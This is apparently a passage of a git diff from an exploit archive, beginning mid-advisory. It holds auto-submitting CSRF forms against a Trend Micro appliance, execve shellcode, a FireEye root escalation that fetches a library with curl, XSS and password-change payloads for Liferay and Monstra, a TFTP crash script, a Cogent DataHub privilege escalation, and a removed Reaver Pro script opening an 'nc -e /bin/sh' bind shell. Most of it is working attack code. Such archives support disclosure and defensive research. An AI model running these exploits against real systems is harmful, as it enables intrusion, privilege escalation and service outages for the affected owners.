<input type="hidden" name="adm_email_address" value="punksnotdead@hell.com"
/>
<input type="hidden" name="sender_address" value="punksnotdead@hell.com" />
<input type="hidden" name="mail_server" value="x.x.x.x" />
<input type="hidden" name="mail_server_port" value="25" />
<input type="hidden" name="showusername" value="" />
<input type="hidden" name="showpassword" value="" />
<input type="hidden" name="max_notification_per_hour" value="5" />
<input type="hidden" name="check_mail_queue" value="60" />
<input type="hidden" name="server" value="x.x.x.x" />
<input type="hidden" name="port" value="25" />
<input type="hidden" name="admin_address" value="" />
<input type="hidden" name="from_address" value="PWNED@PWNED.com" />
<input type="hidden" name="username" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="freq_limit_interval" value="3600" />
<input type="hidden" name="freq_limit_softlimit" value="5" />
<input type="hidden" name="testconnect" value="config" />
<input type="hidden" name="which_cgi_flag" value="" />
<input type="hidden" name="alert_message" value="" />
<input type="hidden" name="save_status" value="false" />
<script>document.getElementById('CSRF-Notifications').submit()</script>
</form>
4) Change system settings ( x.x.x.x = whatever IP we want )
<form id='PWNED' target="demonica" action="
https://localhost/cgi-bin/admin_ip.cgi" method="post">
<input type="hidden" name="txtHostname" value="localhost" />
<input type="hidden" name="radioType" value="radiobutton" />
<input type="hidden" name="txtIP" value="x.x.x.x" />
<input type="hidden" name="txtNetmask" value="255.255.0.0" />
<input type="hidden" name="txtGateway" value="x.x.x.x" />
<input type="hidden" name="txtDNS1" value="x.x.x.x" />
<input type="hidden" name="txtDNS2" value="x.x.x.x" />
<input type="hidden" name="txtIP_ip6" value="" />
<input type="hidden" name="txtIP_ip6_prefix" value="" />
<input type="hidden" name="txtGateway_ip6" value="" />
<input type="hidden" name="txtDNS1_ip6" value="" />
<input type="hidden" name="td_start" value="Start" />
<input type="hidden" name="td_start" value="Start" />
<input type="hidden" name="td_analyze" value="View" />
<input type="hidden" name="td_export" value="Export" />
<input type="hidden" name="td_reset" value="Reset" />
<input type="hidden" name="button1112" value="Cancel" />
<input type="hidden" name="network_type" value="static" />
<input type="hidden" name="act" value="save" />
<input type="hidden" name="Hostname" value="localhost" />
<input type="hidden" name="IP" value="x.x.x.x" />
<input type="hidden" name="Netmask" value="255.255.0.0" />
<input type="hidden" name="Gateway" value="x.x.x.x" />
<input type="hidden" name="DNS1" value="x.x.x.x" />
<input type="hidden" name="DNS2" value="x.x.x.x" />
<input type="hidden" name="enable_ip6" value="no" />
<input type="hidden" name="network_type_ip6" value="static" />
<input type="hidden" name="IP_ip6" value="" />
<input type="hidden" name="IP_ip6_prefix" value="" />
<input type="hidden" name="Gateway_ip6" value="" />
<input type="hidden" name="DNS1_ip6" value="" />
<input type="hidden" name="port1_nic" value="eth0" />
<input type="hidden" name="port1_type" value="auto" />
<input type="hidden" name="port1_speed" value="" />
<input type="hidden" name="port1_duplex" value="" />
<input type="hidden" name="port1_attr" value="MGMT" />
<input type="hidden" name="port1_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port1_state" value="1000" />
<input type="hidden" name="port2_nic" value="eth1" />
<input type="hidden" name="port2_type" value="auto" />
<input type="hidden" name="port2_speed" value="" />
<input type="hidden" name="port2_duplex" value="" />
<input type="hidden" name="port2_attr" value="INT" />
<input type="hidden" name="port2_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port2_state" value="1000" />
<input type="hidden" name="port3_nic" value="eth2" />
<input type="hidden" name="port3_type" value="auto" />
<input type="hidden" name="port3_speed" value="" />
<input type="hidden" name="port3_duplex" value="" />
<input type="hidden" name="port3_attr" value="INT" />
<input type="hidden" name="port3_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port3_state" value="1000" />
<input type="hidden" name="port4_nic" value="eth3" />
<input type="hidden" name="port4_type" value="auto" />
<input type="hidden" name="port4_speed" value="" />
<input type="hidden" name="port4_duplex" value="" />
<input type="hidden" name="port4_attr" value="INT" />
<input type="hidden" name="port4_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port4_state" value="-1" />
<input type="hidden" name="port5_nic" value="eth4" />
<input type="hidden" name="port5_type" value="auto" />
<input type="hidden" name="port5_speed" value="" />
<input type="hidden" name="port5_duplex" value="" />
<input type="hidden" name="port5_attr" value="INT" />
<input type="hidden" name="port5_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port5_state" value="-1" />
<input type="hidden" name="port6_nic" value="eth5" />
<input type="hidden" name="port6_type" value="auto" />
<input type="hidden" name="port6_speed" value="" />
<input type="hidden" name="port6_duplex" value="" />
<input type="hidden" name="port6_attr" value="INT" />
<input type="hidden" name="port6_cap"
value="auto%3A10H%3A10F%3A100H%3A100F%3A1000F" />
<input type="hidden" name="port6_state" value="-1" />
<input type="hidden" name="port7_nic" value="eth6" />
<input type="hidden" name="port7_type" value="manual" />
<input type="hidden" name="port7_speed" value="10000" />
<input type="hidden" name="port7_duplex" value="full" />
<input type="hidden" name="port7_attr" value="INT" />
<input type="hidden" name="port7_cap" value="10000F" />
<input type="hidden" name="port7_state" value="-1" />
<input type="hidden" name="port8_nic" value="eth7" />
<input type="hidden" name="port8_type" value="manual" />
<input type="hidden" name="port8_speed" value="10000" />
<input type="hidden" name="port8_duplex" value="full" />
<input type="hidden" name="port8_attr" value="INT" />
<input type="hidden" name="port8_cap" value="10000F" />
<input type="hidden" name="port8_state" value="-1" />
<input type="hidden" name="port9_nic" value="ext3" />
<input type="hidden" name="port9_type" value="auto" />
<input type="hidden" name="port9_speed" value="" />
<input type="hidden" name="port9_duplex" value="" />
<input type="hidden" name="port9_attr" value="N%2FA" />
<input type="hidden" name="port9_cap" value="" />
<input type="hidden" name="port9_state" value="" />
<input type="hidden" name="port10_nic" value="ext4" />
<input type="hidden" name="port10_type" value="auto" />
<input type="hidden" name="port10_speed" value="" />
<input type="hidden" name="port10_duplex" value="" />
<input type="hidden" name="port10_attr" value="N%2FA" />
<input type="hidden" name="port10_cap" value="" />
<input type="hidden" name="port10_state" value="" />
<input type="hidden" name="port11_nic" value="ext5" />
<input type="hidden" name="port11_type" value="auto" />
<input type="hidden" name="port11_speed" value="" />
<input type="hidden" name="port11_duplex" value="" />
<input type="hidden" name="port11_attr" value="N%2FA" />
<input type="hidden" name="port11_cap" value="" />
<input type="hidden" name="port11_state" value="" />
<input type="hidden" name="port12_nic" value="ext6" />
<input type="hidden" name="port12_type" value="auto" />
<input type="hidden" name="port12_speed" value="" />
<input type="hidden" name="port12_duplex" value="" />
<input type="hidden" name="port12_attr" value="N%2FA" />
<input type="hidden" name="port12_cap" value="" />
<input type="hidden" name="port12_state" value="" />
<input type="hidden" name="port13_nic" value="ext7" />
<input type="hidden" name="port13_type" value="auto" />
<input type="hidden" name="port13_speed" value="" />
<input type="hidden" name="port13_duplex" value="" />
<input type="hidden" name="port13_attr" value="N%2FA" />
<input type="hidden" name="port13_cap" value="" />
<input type="hidden" name="port13_state" value="" />
<input type="hidden" name="port14_nic" value="ext8" />
<input type="hidden" name="port14_type" value="auto" />
<input type="hidden" name="port14_speed" value="" />
<input type="hidden" name="port14_duplex" value="" />
<input type="hidden" name="port14_attr" value="N%2FA" />
<input type="hidden" name="port14_cap" value="" />
<input type="hidden" name="port14_state" value="" />
<input type="hidden" name="port15_nic" value="ext9" />
<input type="hidden" name="port15_type" value="auto" />
<input type="hidden" name="port15_speed" value="" />
<input type="hidden" name="port15_duplex" value="" />
<input type="hidden" name="port15_attr" value="N%2FA" />
<input type="hidden" name="port15_cap" value="" />
<input type="hidden" name="port15_state" value="" />
<input type="hidden" name="port16_nic" value="ext10" />
<input type="hidden" name="port16_type" value="auto" />
<input type="hidden" name="port16_speed" value="" />
<input type="hidden" name="port16_duplex" value="" />
<input type="hidden" name="port16_attr" value="N%2FA" />
<input type="hidden" name="port16_cap" value="" />
<input type="hidden" name="port16_state" value="" />
<input type="hidden" name="port17_nic" value="ext11" />
<input type="hidden" name="port17_type" value="auto" />
<input type="hidden" name="port17_speed" value="" />
<input type="hidden" name="port17_duplex" value="" />
<input type="hidden" name="port17_attr" value="N%2FA" />
<input type="hidden" name="port17_cap" value="" />
<input type="hidden" name="port17_state" value="" />
<input type="hidden" name="port18_nic" value="ext12" />
<input type="hidden" name="port18_type" value="auto" />
<input type="hidden" name="port18_speed" value="" />
<input type="hidden" name="port18_duplex" value="" />
<input type="hidden" name="port18_attr" value="N%2FA" />
<input type="hidden" name="port18_cap" value="" />
<input type="hidden" name="port18_state" value="" />
<input type="hidden" name="port19_nic" value="ext13" />
<input type="hidden" name="port19_type" value="auto" />
<input type="hidden" name="port19_speed" value="" />
<input type="hidden" name="port19_duplex" value="" />
<input type="hidden" name="port19_attr" value="N%2FA" />
<input type="hidden" name="port19_cap" value="" />
<input type="hidden" name="port19_state" value="" />
<input type="hidden" name="port20_nic" value="ext14" />
<input type="hidden" name="port20_type" value="auto" />
<input type="hidden" name="port20_speed" value="" />
<input type="hidden" name="port20_duplex" value="" />
<input type="hidden" name="port20_attr" value="N%2FA" />
<input type="hidden" name="port20_cap" value="" />
<input type="hidden" name="port20_state" value="" />
<input type="hidden" name="tcpdump" value="" />
<input type="hidden" name="interface" value="" />
<input type="hidden" name="vlan_enable" value="0" />
<script>document.getElementById('PWNED').submit()</script>
</form>
Disclosure Timeline:
=======================================
Vendor Notification: November 23, 2015
March 25, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
========================================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8
========================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

51
platforms/lin_x86-64/shellcode/39624.c Executable file
View file

@ -0,0 +1,51 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_x64 - execve(/bin/sh) - 25 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
Thanks for Unknown Commented in my Blog
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: eb 0b jmp 0x40008d
400082: 5f pop rdi
400083: 48 31 d2 xor rdx,rdx
400086: 52 push rdx
400087: 5e pop rsi
400088: 6a 3b push 0x3b
40008a: 58 pop rax
40008b: 0f 05 syscall
40008d: e8 f0 ff ff ff call 0x400082
400092: 2f (bad)
400093: 62 (bad)
400094: 69 .byte 0x69
400095: 6e outs dx,BYTE PTR ds:[rsi]
400096: 2f (bad)
400097: 73 68 jae 0x400101
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

52
platforms/lin_x86-64/shellcode/39625.c Executable file
View file

@ -0,0 +1,52 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_x64 - execve(/bin/bash) - 33 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: eb 0b jmp 0x40008d
400082: 5f pop rdi
400083: 48 31 d2 xor rdx,rdx
400086: 52 push rdx
400087: 5e pop rsi
400088: 6a 3b push 0x3b
40008a: 58 pop rax
40008b: 0f 05 syscall
40008d: e8 f0 ff ff ff call 0x400082
400092: 2f (bad)
400093: 2f (bad)
400094: 2f (bad)
400095: 2f (bad)
400096: 62 (bad)
400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f
40009e: 62 .byte 0x62
40009f: 61 (bad)
4000a0: 73 68 jae 0x40010a
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bash_shell bash_shell.c
$ execstack -s bash_shell
$ ./bash_shell
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

38
platforms/linux/local/39628.txt Executable file
View file

@ -0,0 +1,38 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670
The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group:
$ ls -l /data/snort/config/snort.conf
-rw-rw-r-- 1 fenet contents 1332 Dec 2 18:02 /data/snort/config/snort.conf
This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration.
# mount | grep -v noexec | grep rw
...
/dev/sda8 on /var type ext4 (rw,noatime)
/dev/sda11 on /data type ext4 (rw,noatime)
/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0)
tmpfs on /dev/shm type tmpfs (rw)
It looks like /dev/shm is a good candidate for storing a shared library.
First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance:
$ cat test.c
void __attribute__((constructor)) init(void)
{
system("/usr/bin/id > /tmp/output.txt");
}
$ gcc test.c -shared -s -fPIC -o test.so
Now fetch that object on the FireEye machine, and instruct snort to load it:
fireeye$ curl http://example.com/test.so > /dev/shm/test.so
fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf
The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root:
fireeye$ cat /tmp/output.txt
uid=0(admin) gid=0(root) groups=0(root)
And now were root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action.

43
platforms/multiple/webapps/39626.txt Executable file
View file

@ -0,0 +1,43 @@
#Exploit Title: Liferay Portal 5.1.2 - Persistent XSS
#Discovery Date: 2016-02-10
#Exploit Author: Sarim Kiani
#Vendor Homepage: https://www.liferay.com
#Software Link: https://www.liferay.com/community/releases
#Version: 5.1.2
#Tested on: Windows OS
Liferay Portal 5.1.2 is an open source version of Liferay's enterprise web platform for building business solutions that deliver immediate results and long-term value.
1. Vulnerability Description:
A persistent XSS exists in "My Account" page of the application.
2. Proof of Concept:
Any user entering personal information in the "My Account" page of the application can insert XSS Payload in the Form.
Test Payload: "><script>alert(1);</script>
Parameter: _79_jobTitle
Parameter Name: Job Title
POST /user/test/home?p_p_id=79&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user HTTP/1.1
Host: localhost:8082
Content-Length: 2712
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:8082/user/test/home?p_p_id=79&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: LFR_SESSION_STATE_10127=1459071499499; COOKIE_SUPPORT=true; JSESSIONID=F53EC8D33C0D3ED9AD62FDA0BB682201; COMPANY_ID=10106; ID=7a31746f4f4c712f4179453d; PASSWORD=4e4c77485138744d61356f3d; LOGIN=74657374406c6966657261792e636f6d; SCREEN_NAME=4e4c77485138744d61356f3d; GUEST_LANGUAGE_ID=en_US
Connection: close
_79_cmd=update&_79_tabs2=display&_79_tabs3=email-addresses&_79_tabs4=phone-numbers&_79_redirect=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fedit_user%26_79_tabs2%3Ddisplay%26_79_tabs3%3Demail-addresses%26_79_tabs4%3Dphone-numbers%26_79_backURL%3Dhttp%253A%252F%252Flocalhost%253A8082%252Fuser%252Ftest%252Fhome%253Fp_p_id%253D79%2526p_p_lifecycle%253D0%2526p_p_state%253Dmaximized%2526p_p_mode%253Dview%2526_79_struts_action%253D%25252Fenterprise_admin%25252Fview%2526_79_tabs1%253Dusers%2526_79_tabs2%253D%2526_79_tabs3%253D%2526_79_keywords%253D%2526_79_advancedSearch%253Dfalse%2526_79_andOperator%253Dtrue%2526_79_firstName%253D%2526_79_middleName%253D%2526_79_lastName%253D%2526_79_screenName%253D%2526_79_emailAddress%253D%2526_79_active%253Dtrue%2526_79_organizationId%253D0%2526_79_roleId%253D0%2526_79_userGroupId%253D0%2526_79_cur%253D1%26_79_p_u_i_d%3D&_79_backURL=http%3A%2F%2Flocalhost%3A8082%2Fuser%2Ftest%2Fhome%3Fp_p_id%3D79%26p_p_lifecycle%3D0%26p_p_state%3Dmaximized%26p_p_mode%3Dview%26_79_struts_action%3D%252Fenterprise_admin%252Fview%26_79_tabs1%3Dusers%26_79_tabs2%3D%26_79_tabs3%3D%26_79_keywords%3D%26_79_advancedSearch%3Dfalse%26_79_andOperator%3Dtrue%26_79_firstName%3D%26_79_middleName%3D%26_79_lastName%3D%26_79_screenName%3D%26_79_emailAddress%3D%26_79_active%3Dtrue%26_79_organizationId%3D0%26_79_roleId%3D0%26_79_userGroupId%3D0%26_79_cur%3D1&_79_p_u_i_d=10301&_79_tabs1TabsScroll=&_79_screenName=user&_79_emailAddress=user%40xyz.com&_79_prefixId=&_79_firstName=John&_79_middleName=&_79_lastName=Hopkins&_79_suffixId=&_79_birthdayMonth=0&_79_birthdayDay=1&_79_birthdayYear=1970&_79_male=1&_79_organizationIds=&_79_organizationNames=&_79_jobTitle=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&_79_tabs2TabsScroll=&_79_languageId=en_US&_79_timeZoneId=Pacific%2FMidway&_79_greeting=Welcome+John+Hopkins%21&_79_password1=&_79_password2=&_79_passwordReset=false&_79_tabs3TabsScroll=&_79_tabs4TabsScroll=&_79_openId=&_79_smsSn=&_79_aimSn=&_79_icqSn=&_79_jabberSn=&_79_msnSn=&_79_skypeSn=&_79_ymSn=&_79_facebookSn=&_79_mySpaceSn=&_79_twitterSn=&_79_announcementsTypegeneralEmail=false&_79_announcementsTypegeneralSms=false&_79_announcementsTypegeneralWebsite=true&_79_announcementsTypegeneralWebsiteCheckbox=on&_79_announcementsTypenewsEmail=false&_79_announcementsTypenewsSms=false&_79_announcementsTypenewsWebsite=true&_79_announcementsTypenewsWebsiteCheckbox=on&_79_announcementsTypetestEmail=false&_79_announcementsTypetestSms=false&_79_announcementsTypetestWebsite=true&_79_announcementsTypetestWebsiteCheckbox=on&_79_tabs1TabsScroll=&_79_comments=
3. Solution:
Issue has been resolved in newer versions. Upgrade to 6.1 CE or newer.

133
platforms/php/webapps/39567.txt Executable file
View file

@ -0,0 +1,133 @@
Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change
Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS
==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================
Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405
Application Description: Monstra is a modern light weighted Content Management System written in php.
1. Vulnerability Description:
Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.
Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
http://localhost/monstra-3.0.3/users/1
The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.
Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.
2. Proof of Concept/Code Flaw:
`In file monstra\plugins\box\users\users.plugin.php
Function: getProfileEdit
Line No: 233
if (Users::$users->update(Request::post('user_id'),
array('login' => Security::safeName(Request::post('login')),
'firstname' => Request::post('firstname'),
'lastname' => Request::post('lastname'),
'email' => Request::post('email'),
'skype' => Request::post('skype'),
'about_me' => Request::post('about_me'),
'twitter' => Request::post('twitter')))) {
// Change password
if (trim(Request::post('new_password')) != '') {
Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
}
Notification::set('success', __('Your changes have been saved.', 'users'));
Request::redirect(Site::url().'/users/'.$user['id']);
On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality
Users::$users->update --> updates the password`
Header:
> POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B
csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save
3. Solution:
Vendor has resolved the issue, use the patch 'User Security Fix # 406'.
Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5
##################################################################################
#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS
Monstra is a modern light weighted Content Management System written in php.
1. Description
A Persistent XSS exists in the "Edit Profile" page of the application.
2. Proof of Concept
Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.
Payload: "><script>alert(1);</script>
The following entries on the page are vulnerable to a Persistent XSS payload:
'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.
POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440
csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save
3.Solution
No newer (fixed) versions are currently available.

24
platforms/windows/dos/39627.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
# * https://www.exploit-db.com/exploits/26010/
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server
from socket import *
import sys, select
address = ('127.0.0.1', 69)
# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)

23
platforms/windows/local/37898.py
View file

@ -1,23 +0,0 @@
source: http://www.securityfocus.com/bid/55725/info
Reaver Pro is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers.
#!/usr/bin/env python
import os
print """
Reaver Pro Local Root
Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")

65
platforms/windows/local/39630.g Executable file
View file

@ -0,0 +1,65 @@
/*
# Exploit Title: Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege Vulnerability
# Google Dork: lol
# Date: 28/3/2016
# Exploit Author: mr_me
# Vendor Homepage: http://www.cogentdatahub.com/
# Software Link: http://www.cogentdatahub.com/Contact_Form.html
# Version: <= 7.3.9
# Tested on: Windows 7 x86
# CVE : CVE2016-2288
sha1sum: c1806faf0225d0c7f96848cb9799b15f8b249792 CogentDataHub-7.3.9-150902-Windows.exe
Advsiory: https://ics-cert.us-cert.gov/advisories/ICSA-16-084-01
Timeline:
=========
- 02/12/2015 : vuln found, case opened to the zdi
- 09/02/2016 : case rejected (not interested in this vuln due to vector)
- 26/02/2016 : reported to ICS-CERT
- 24/03/2016 : advisory released
Notes:
======
- to reach SYSTEM, the service needs to be installed via the Service Manager
- the service doesnt need to be installed, as long as 'C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe' has been executed by a privileged user
- an attacker does NOT need to restart the machine or the service in order to EP, the service just polls for the Gamma Script
Exploitation:
=============
As a Guest user (or low privileged user) save this file as 'WebstreamSupport.g' into C:\usr\cogent\require\ and enjoy the free SYSTEM calcs. Most OS's dont allow
a write into c:\ as guest, but we are in the SCADA world. Anything is possible.
C:\Users\steven>sc qc "Cogent DataHub"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Cogent DataHub
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Cogent\Cogent DataHub\CogentDataHubV7.exe" -H "C:\Users\steven\AppData\Roaming\Cogent DataHub"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Cogent DataHub
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
C:\Users\steven>
*/
require ("Application");
require ("AsyncRun"); // thanks to our friends @ Cogent
class WebstreamSupport Application
{
}
method WebstreamSupport.constructor ()
{
RunCommandAsync(nil, nil, "cmd.exe /c calc", "c:\\");
}
Webstream = ApplicationSingleton (WebstreamSupport);

183
platforms/windows/local/9207.sh
View file

@ -1,183 +0,0 @@
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
function cleanup()
{
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
rm -rf $workdir/PATMP*
}
cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
